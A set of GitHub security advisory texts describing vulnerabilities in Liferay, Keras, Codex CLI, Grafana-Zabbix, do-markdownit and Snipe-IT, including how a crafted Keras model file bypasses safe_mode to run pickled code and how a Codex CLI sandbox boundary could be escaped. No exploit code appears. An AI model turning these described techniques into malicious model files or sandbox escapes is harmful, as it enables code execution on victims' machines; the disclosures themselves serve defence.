Source
ghsa
Insecure direct object reference (IDOR) vulnerability in the Contacts Center widget in Liferay Portal 7.4.0 through 7.4.3.119, and older unsupported versions, and Liferay DXP 2023.Q4.0 through 2023.Q4.6, 2023.Q3.1 through 2023.Q3.10, 7.4 GA through update 92, and older unsupported versions allows remote attackers to view contact information, including the contact’s name and email address, via the _com_liferay_contacts_web_portlet_ContactsCenterPortlet_entryId parameter.
Cross-Site Request Forgery (CSRF) vulnerability in the server (license) registration page in Liferay Portal 7.4.0 through 7.4.3.111, and older unsupported versions, and Liferay DXP 2023.Q4.0 through 2023.Q4.7, 2023.Q3.1 through 2023.Q3.9, 7.4 GA through update 92, and older unsupported versions allows remote attackers to register a server license via the 'orderUuid' parameter.
**Note:** This report has already been discussed with the Google OSS VRP team, who recommended that I reach out directly to the Keras team. I’ve chosen to do so privately rather than opening a public issue, due to the potential security implications. I also attempted to use the email address listed in your `SECURITY.md`, but received no response. --- ## Summary When a model in the `.h5` (or `.hdf5`) format is loaded using the Keras `Model.load_model` method, the `safe_mode=True` setting is **silently** ignored without any warning or error. This allows an attacker to execute arbitrary code on the victim’s machine with the same privileges as the Keras application. This report is specific to the `.h5`/`.hdf5` file format. The attack works regardless of the other parameters passed to `load_model` and does not require any sophisticated technique—`.h5` and `.hdf5` files are simply not checked for unsafe code execution. From this point on, I will refer only to the `.h5` file format, thoug...
Due to a bug in the sandbox configuration logic, Codex CLI could treat a model-generated `cwd` as the sandbox’s writable root, including paths outside of the folder where the user started their session. This logic bypassed the intended workspace boundary and enables arbitrary file writes and command execution where the Codex process has permissions - this did not impact the network-disabled sandbox restriction. **Remediation** We released a patch in Codex CLI **0.39.0** that canonicalizes and validates that the boundary used for sandbox policy is based on where the user started the session, and not the one generated by the model. Users running 0.38.0 or earlier should update immediately via their package manager or by reinstalling the latest Codex CLI to ensure sandbox boundaries are enforced. If using the Codex IDE extension, users should immediately update to **0.4.12** for a fix of the sandbox issue.
Grafana is an open-source platform for monitoring and observability. Grafana-Zabbix is a plugin for Grafana allowing to visualize monitoring data from Zabbix and create dashboards for analyzing metrics and realtime monitoring. Versions 5.2.1 and below contained a ReDoS vulnerability via user-supplied regex query which could causes CPU usage to max out. This vulnerability is fixed in version 6.0.0.
### Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-36rr-ww3j-vrjv. This link is maintained to preserve external references. ### Original Description The Keras Model.load_model method can be exploited to achieve arbitrary code execution, even with safe_mode=True. One can create a specially crafted .h5/.hdf5 model archive that, when loaded via Model.load_model, will trigger arbitrary code to be executed. This is achieved by crafting a special .h5 archive file that uses the Lambda layer feature of keras which allows arbitrary Python code in the form of pickled code. The vulnerability comes from the fact that the safe_mode=True option is not honored when reading .h5 archives. Note that the .h5/.hdf5 format is a legacy format supported by Keras 3 for backwards compatibility.
The Keras Model.load_model method can be exploited to achieve arbitrary code execution, even with safe_mode=True. One can create a specially crafted .keras model archive that, when loaded via Model.load_model, will trigger arbitrary code to be executed. This is achieved by crafting a special config.json (a file within the .keras archive) that will invoke keras.config.enable_unsafe_deserialization() to disable safe mode. Once safe mode is disable, one can use the Lambda layer feature of keras, which allows arbitrary Python code in the form of pickled code. Both can appear in the same archive. Simply the keras.config.enable_unsafe_deserialization() needs to appear first in the archive and the Lambda with arbitrary code needs to be second.
In the @digitalocean/do-markdownit package through 1.16.1 (in npm), the callout and fence_environment plugins perform .includes substring matching if allowedClasses or allowedEnvironments is a string (instead of an array).
Snipe-IT before 8.1.18 allows unsafe deserialization.
Snipe-IT before 8.1.18 allows XSS.